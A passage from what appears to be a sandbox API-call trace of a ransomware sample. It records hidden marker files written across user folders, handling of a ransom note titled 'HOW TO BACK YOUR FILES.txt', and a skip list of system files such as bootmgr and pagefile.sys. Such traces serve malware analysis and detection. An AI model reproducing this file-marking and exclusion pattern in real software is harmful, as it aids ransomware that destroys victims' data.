(hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.572] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.572] CloseHandle (hObject=0x298) returned 1 [0060.572] CloseHandle (hObject=0x29c) returned 1 [0060.572] GetCurrentThreadId () returned 0xcc8 [0060.572] RtlInterlockedPopEntrySList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x1221e8 [0060.572] lstrcpynW (in: lpString1=0x11ceb60, lpString2="C:\\Users\\Default\\Links", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0060.572] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf7878 | out: hHeap=0xe0000) returned 1 [0060.572] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221e0 | out: hHeap=0xe0000) returned 1 [0060.572] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\Links" | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0060.572] lstrcatW (in: lpString1="C:\\Users\\Default\\Links", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Links\\") returned="C:\\Users\\Default\\Links\\" [0060.572] lstrcatW (in: lpString1="C:\\Users\\Default\\Links\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\Links\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\Links\\.BFC0E91B00AE8A0620D3" [0060.572] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\links\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0060.573] WriteFile (in: hFile=0x29c, lpBuffer=0x11cdb68*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb20, lpOverlapped=0x0 | out: lpBuffer=0x11cdb68*, lpNumberOfBytesWritten=0x11ccb20*=0x3d4, lpOverlapped=0x0) returned 1 [0060.576] FlushFileBuffers (hFile=0x29c) returned 1 [0060.577] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Links\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.577] CloseHandle (hObject=0x29c) returned 1 [0060.578] lstrlenW (lpString="C:\\Users\\Default\\Links") returned 22 [0060.578] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.578] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*", lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed6d43c5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0060.578] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.578] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.578] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.578] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.578] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed6d43c5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.578] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.578] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.578] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.578] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.578] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.578] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed6d43c5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed6d43c5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed6d43c5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.578] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.578] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.578] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed6d43c5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed6d43c5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed6d43c5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.579] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0060.579] lstrcpyW (in: lpString1=0x11ceb8e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.579] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\links\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x29c [0060.579] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0060.579] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.579] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.580] CloseHandle (hObject=0x298) returned 1 [0060.580] CloseHandle (hObject=0x29c) returned 1 [0060.580] GetCurrentThreadId () returned 0xcc8 [0060.580] RtlInterlockedPopEntrySList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x1221c8 [0060.580] lstrcpynW (in: lpString1=0x11ceb60, lpString2="C:\\Users\\Default\\Favorites", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0060.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102910 | out: hHeap=0xe0000) returned 1 [0060.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221c0 | out: hHeap=0xe0000) returned 1 [0060.580] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0060.580] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0060.580] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\Favorites\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\Favorites\\.BFC0E91B00AE8A0620D3" [0060.580] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\favorites\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0060.581] WriteFile (in: hFile=0x29c, lpBuffer=0x11cdb68*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb20, lpOverlapped=0x0 | out: lpBuffer=0x11cdb68*, lpNumberOfBytesWritten=0x11ccb20*=0x3d4, lpOverlapped=0x0) returned 1 [0060.583] FlushFileBuffers (hFile=0x29c) returned 1 [0060.584] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.584] CloseHandle (hObject=0x29c) returned 1 [0060.584] lstrlenW (lpString="C:\\Users\\Default\\Favorites") returned 26 [0060.584] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.584] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed6fa635, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0060.585] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.585] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.585] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.585] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.585] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed6fa635, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.585] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.585] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.585] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.585] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.585] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.585] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed6fa635, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed6fa635, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed6fa635, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.585] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.585] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.585] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed6fa635, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed6fa635, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed6fa635, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.585] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0060.585] lstrcpyW (in: lpString1=0x11ceb96, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.585] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\favorites\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x29c [0060.586] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.586] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.586] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.586] CloseHandle (hObject=0x2a0) returned 1 [0060.586] CloseHandle (hObject=0x29c) returned 1 [0060.586] GetCurrentThreadId () returned 0xcc8 [0060.586] RtlInterlockedPopEntrySList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x122148 [0060.586] lstrcpynW (in: lpString1=0x11ceb60, lpString2="C:\\Users\\Default\\Downloads", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0060.586] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102890 | out: hHeap=0xe0000) returned 1 [0060.586] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0060.587] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0060.587] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\" [0060.587] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\Downloads\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\Downloads\\.BFC0E91B00AE8A0620D3" [0060.587] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\downloads\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0060.587] WriteFile (in: hFile=0x29c, lpBuffer=0x11cdb68*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb20, lpOverlapped=0x0 | out: lpBuffer=0x11cdb68*, lpNumberOfBytesWritten=0x11ccb20*=0x3d4, lpOverlapped=0x0) returned 1 [0060.590] FlushFileBuffers (hFile=0x29c) returned 1 [0060.591] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Downloads\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.591] CloseHandle (hObject=0x29c) returned 1 [0060.591] lstrlenW (lpString="C:\\Users\\Default\\Downloads") returned 26 [0060.591] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.591] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed6fa635, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0060.592] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.592] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.592] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.592] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.592] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed6fa635, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.592] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.592] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.592] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.592] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.592] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.592] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed6fa635, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed6fa635, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed6fa635, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.592] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.592] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.592] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed6fa635, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed6fa635, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed6fa635, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.592] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0060.592] lstrcpyW (in: lpString1=0x11ceb96, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.592] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\downloads\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x29c [0060.592] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.593] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.593] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.593] CloseHandle (hObject=0x2a0) returned 1 [0060.593] CloseHandle (hObject=0x29c) returned 1 [0060.593] GetCurrentThreadId () returned 0xcc8 [0060.593] RtlInterlockedPopEntrySList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x121fe8 [0060.593] lstrcpynW (in: lpString1=0x11ceb60, lpString2="C:\\Users\\Default\\Documents", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0060.593] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102590 | out: hHeap=0xe0000) returned 1 [0060.593] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0060.593] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0060.593] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0060.593] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\Documents\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\Documents\\.BFC0E91B00AE8A0620D3" [0060.593] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\documents\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0060.595] WriteFile (in: hFile=0x29c, lpBuffer=0x11cdb68*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb20, lpOverlapped=0x0 | out: lpBuffer=0x11cdb68*, lpNumberOfBytesWritten=0x11ccb20*=0x3d4, lpOverlapped=0x0) returned 1 [0060.599] FlushFileBuffers (hFile=0x29c) returned 1 [0060.613] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Documents\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.613] CloseHandle (hObject=0x29c) returned 1 [0060.614] lstrlenW (lpString="C:\\Users\\Default\\Documents") returned 26 [0060.614] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.614] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*", lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed6fa635, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0060.614] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.614] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.614] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.614] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.614] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f654c1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed6fa635, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.614] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.614] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.614] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.614] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.614] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.614] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed6fa635, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed6fa635, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed720ac7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.614] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.614] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.614] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d42963, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x5d42963, ftLastAccessTime.dwHighDateTime=0x1d32721, ftLastWriteTime.dwLowDateTime=0x5d42963, ftLastWriteTime.dwHighDateTime=0x1d32721, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0060.614] lstrcmpiW (lpString1="My Music", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.614] lstrcmpiW (lpString1="My Music", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.614] lstrcmpiW (lpString1="My Music", lpString2="Rabbit4444.exe") returned -1 [0060.614] lstrcmpiW (lpString1="My Music", lpString2=".") returned 1 [0060.614] lstrcmpiW (lpString1="My Music", lpString2="..") returned 1 [0060.614] lstrcmpiW (lpString1="My Music", lpString2="windows") returned -1 [0060.614] lstrcmpiW (lpString1="My Music", lpString2="bootmgr") returned 1 [0060.614] lstrcmpiW (lpString1="My Music", lpString2="pagefile.sys") returned -1 [0060.614] lstrcmpiW (lpString1="My Music", lpString2="boot") returned 1 [0060.614] lstrcmpiW (lpString1="My Music", lpString2="ids.txt") returned 1 [0060.614] lstrcmpiW (lpString1="My Music", lpString2="NTUSER.DAT") returned -1 [0060.614] lstrcpyW (in: lpString1=0x11ceb96, lpString2="My Music" | out: lpString1="My Music") returned="My Music" [0060.615] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Documents\\My Music", dwFileAttributes=0x2412) returned 1 [0060.615] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\Documents\\My Music\r\n") returned 54 [0060.616] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\Documents\\My Music\r\n") returned 54 [0060.616] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, 